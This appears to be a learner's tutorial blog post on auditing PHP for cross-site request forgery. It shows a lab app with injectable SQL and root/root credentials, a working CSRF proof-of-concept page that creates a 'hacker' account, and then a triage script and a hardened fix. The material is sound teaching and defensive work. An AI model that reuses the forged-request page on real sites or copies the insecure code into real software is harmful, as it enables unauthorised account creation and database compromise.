Notes written down by a network-security learner along the way, in the hope of growing, learning, sharing and improving together with everyone on CSDN. This post covers cross-site request forgery (CSRF) in code auditing; I hope it helps those just getting started with code auditing, experts are welcome to take a look, please go easy on me, and feel free to message me to exchange ideas. The article draws on several references; thanks to the masters who taught me security, and thanks for being born in this internet age where knowledge is within reach.
CSRF
Cross-Site Request Forgery
Principle: without the user noticing, the attacker makes the user's browser send a malicious HTTP request to a site that is vulnerable to CSRF. Because the browser attaches the user's cookies for that site automatically, the request arrives with the user's identity and the site treats it as the user's own action.
How to find it:
1. Back-end administration, member centre, user creation, profile editing and other functions that change state for the logged-in user
2. The handler files those pages post to (or include) validate neither a CSRF token nor the Referer/Origin header; a session check alone does not tie the request to the site's own page
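To make the second point concrete, here is an added triage script, not code from the original post and not a tool the post uses, that scans PHP sources for handlers reading $_POST or $_REQUEST that never reference a CSRF token, Origin or Referer. Comments are stripped with token_get_all first so a commented-out check is not mistaken for a live one. The four sample sources are constructed for the demo, the keyword lists are an assumption about naming conventions, and the output is a reading list for the auditor, not a verdict.

```php
<?php
// Added example, not code from the original post: a triage pass for the audit
// idea "handler files reading the request body but checking neither a token nor
// the Referer". Heuristic only: a hit means "read this handler", not "vulnerable".
declare(strict_types=1);

/** Drop comments so a commented-out check is not mistaken for a live one. */
function code_without_comments(string $source): string
{
    $out = '';
    foreach (token_get_all($source) as $tok) {
        if (is_array($tok)) {
            if ($tok[0] === T_COMMENT || $tok[0] === T_DOC_COMMENT) {
                continue;
            }
            $out .= $tok[1];
        } else {
            $out .= $tok;
        }
    }
    return $out;
}

/** Why a handler looks CSRF-prone, or null when it shows some check or no write. */
function csrf_triage(string $source): ?string
{
    $code = code_without_comments($source);
    // Reading the request body is our proxy for "this endpoint changes state".
    // Assumption: state changes happen via POST; GET-driven writes need a wider net.
    if (preg_match('/\$_(POST|REQUEST)\b/', $code) !== 1) {
        return null;
    }
    $hasToken  = preg_match('/csrf|token|nonce/i', $code) === 1;   // naming assumption
    $hasOrigin = preg_match('/HTTP_(ORIGIN|REFERER)\b/', $code) === 1;
    if ($hasToken && $hasOrigin) {
        return null;
    }
    if ($hasToken) {
        return 'no Origin/Referer check';
    }
    if ($hasOrigin) {
        return 'no token check';
    }
    return 'no token and no Origin/Referer check';
}

/** Run the triage over name => source pairs and keep only the hits. */
function run_triage(array $sources): array
{
    $findings = [];
    foreach ($sources as $name => $src) {
        $reason = csrf_triage($src);
        if ($reason !== null) {
            $findings[$name] = $reason;
        }
    }
    return $findings;
}

// Constructed sample sources standing in for files found during an audit.
$samples = [];
$samples['reg.php (as posted)'] = <<<'PHP'
<?php
session_start();
if (!isset($_SESSION['username'])) { exit(); }
$username = $_POST['username'];
$password = $_POST['password'];
PHP;
$samples['reg.php (token only)'] = <<<'PHP'
<?php
session_start();
if (!hash_equals($_SESSION['csrf_token'], $_POST['csrf_token'] ?? '')) { exit(); }
$username = $_POST['username'];
PHP;
$samples['commented-out Referer check'] = <<<'PHP'
<?php
// if ($_SERVER['HTTP_REFERER'] !== 'http://localhost/') exit();
$username = $_POST['username'];
PHP;
$samples['view.php (reads only)'] = <<<'PHP'
<?php
echo htmlspecialchars($_GET['id']);
PHP;

foreach (run_triage($samples) as $name => $reason) {
    echo "[CSRF?] $name: $reason\n";
}
```

Run it with `php triage.php`; to use it on a real tree, replace the `$samples` array with `file_get_contents()` of each `.php` file under the web root. The first three samples are reported, the read-only view.php is not. Applications that change state through GET links are missed by the `$_POST`/`$_REQUEST` filter, so widen that pattern when the code base you are auditing does that.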
Example:
User login module, login.html:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>User login</title>
</head>
<body>
<form action="login.php" method="post">
Account: <input type="text" name="username"><br>
Password: <input type="password" name="password"><br>
<input type="submit" value="Log in" name="login">
</form>
</body>
</html>
The server-side script that receives the submitted username and password and logs the user in, login.php:
<?php
header("content-type:text/html;charset=utf-8");
if(!isset($_POST['login'])) {
    exit('illegal access!');
}else{
    $username = $_POST['username'];
    $password = $_POST['password'];
    include ('conn.php');
    // Credentials are concatenated straight into the query (old mysql_* API, PHP 5 era).
    // That is a separate injection issue; the CSRF problem below does not depend on it.
    $sql = "SELECT * FROM user WHERE username='$username' and password='$password';";
    $result = mysql_query($sql);
    if($row = mysql_fetch_array($result)) {
        // On success the username goes into the session. The session cookie set here
        // is what the browser will later attach to the forged request.
        session_start();
        $_SESSION['username'] = $row['username'];
        echo $_SESSION['username']. ",welcome!";
        echo '<a href="reg.html">Add user</a>';
    }
}
The user registration module with the CSRF flaw, reg.html:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Member registration</title>
</head>
<body>
<form action="reg.php" method="post">
User registration<br>
Username: <input type="text" name="username"><br>
Password: <input type="password" name="password"><br>
<input type="submit" name="submit" value="Add user">
</form>
</body>
</html>
The server-side script that receives the submitted username and password and creates the user, reg.php:
<?php
header("content-type:text/html;charset=utf-8");
session_start();
if(!isset($_SESSION['username'])) {
    echo '<script>alert("please login again!")</script>';
    exit();
}else{
    // The only check is "is there a logged-in session". No CSRF token is issued or
    // verified and Origin/Referer are never looked at, so a POST from any page the
    // logged-in user opens is accepted exactly as if it had come from reg.html.
    $username = $_POST['username'];
    $password = $_POST['password'];
    include ('conn.php');
    // The values must be quoted, otherwise MySQL treats hacker as a column name and
    // the INSERT fails; still built by string concatenation, its own injection issue.
    $sql = "INSERT INTO csrf VALUES ('$username','$password')";
    $result = mysql_query($sql);
    if($result) {
        echo '<script>alert("register success!")</script>';
    }else{
        echo '<script>alert("register fail!")</script>';
    }
}
Database connection file, conn.php:
<?php
// Old mysql_* API (removed in PHP 7); database, user and password are all "csrf"/root/root
$conn = mysql_connect("localhost","root","root");
mysql_select_db("csrf",$conn);
Adding a user through reg.html requires being logged in, because reg.php checks that a username exists in the session. That is the only thing it checks; nothing ties the request to the reg.html page itself.
Log in through login.html, submit the reg.html form while capturing the request with an intercepting proxy, and turn the captured POST into a proof of concept, csrf.html:
<html>
<body>
<!-- Rewrites the address bar so the victim sees "/" rather than csrf.html -->
<script>history.pushState('', '', '/')</script>
<!-- Same fields as the reg.html form, pre-filled. When submitted, the browser
     attaches the victim's session cookie for localhost to the cross-site POST -->
<form action="http://localhost/reg.php" method="POST">
<input type="hidden" name="username" value="hacker" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="submit" value="Add user" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Lure the logged-in user into opening csrf.html and clicking the button. The browser sends the victim's session cookie along with the forged POST, reg.php sees a valid session and inserts the user hacker/123456.
Flow diagram:
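As an added example, not code from the original post, here is reg.php rewritten with the two checks the audit looked for and did not find: a per-session synchronizer token that the form page must echo back in a hidden field, and an Origin/Referer check against the site's own origin, plus a prepared statement. The deployment origin https://example.test, the cookie flags, the column names username/password, the use of mysqli and PHP 7.3 or newer (array form of session_set_cookie_params) are assumptions; the database name, credentials and table name follow conn.php and reg.php above.

```php
<?php
// Added example, not code from the original post: reg.php with the two checks
// the audit looks for, a synchronizer token and an Origin/Referer check, plus a
// prepared statement. Assumed: the site is served from https://example.test,
// PHP >= 7.3 (array form of session_set_cookie_params), mysqli is available, and
// the csrf table has columns username and password. DB name, credentials and
// table name follow conn.php / reg.php above.
declare(strict_types=1);

const APP_ORIGIN = 'https://example.test';   // assumption: our own origin

// Cookie flags: with SameSite=Lax the browser omits the session cookie on a
// cross-site POST such as csrf.html's, so reg.php never even sees a session.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

/** Per-session token; the page that renders the form embeds it in a hidden field. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Check 1: the posted token must equal the session's (constant-time compare). */
function csrf_token_valid($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($submitted) && $expected !== '' && hash_equals($expected, $submitted);
}

/** Check 2: Origin, or Referer when Origin is absent, must be our own origin.
 *  A missing header fails closed; on a state change that is the safer default. */
function request_origin_valid(array $server): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if (!is_string($source)) {
        return false;
    }
    $p = parse_url($source);   // "null" (opaque origin) has no scheme and is rejected
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return false;
    }
    $origin = $p['scheme'] . '://' . $p['host'] . (isset($p['port']) ? ':' . $p['port'] : '');
    return $origin === APP_ORIGIN;
}

header('Content-Type: text/html; charset=utf-8');

if (!isset($_SESSION['username'])) {
    exit('please login again!');
}
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    exit('illegal access!');
}
if (!request_origin_valid($_SERVER) || !csrf_token_valid($_POST['csrf_token'] ?? null)) {
    http_response_code(403);
    exit('CSRF check failed');    // where a forged request from another site ends
}

$username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';
if (!is_string($username) || !is_string($password) || $username === '' || $password === '') {
    exit('register fail!');
}

// Prepared statement: the values travel separately from the SQL text.
// The password is stored as posted only to stay compatible with login.php above;
// hashing it is a separate fix from the CSRF one.
$conn = new mysqli('localhost', 'root', 'root', 'csrf');
$stmt = $conn->prepare('INSERT INTO csrf (username, password) VALUES (?, ?)');
if ($stmt === false) {
    exit('register fail!');
}
$stmt->bind_param('ss', $username, $password);
echo $stmt->execute() ? 'register success!' : 'register fail!';
```

The registration form then has to be rendered by PHP (sharing the token helper through an include) so it can carry `<input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token()) ?>">`. With that in place the csrf.html POC fails on every layer: the SameSite=Lax cookie is not sent on the cross-site POST, so there is no session; even if it were, the Origin header names the attacker's site; and the hidden token is something the attacker cannot read. Keep the token as the primary control: some privacy setups strip Referer, and a legitimate request that arrives with neither header is rejected by the fail-closed origin check, which is a usability cost you accept on state-changing endpoints only.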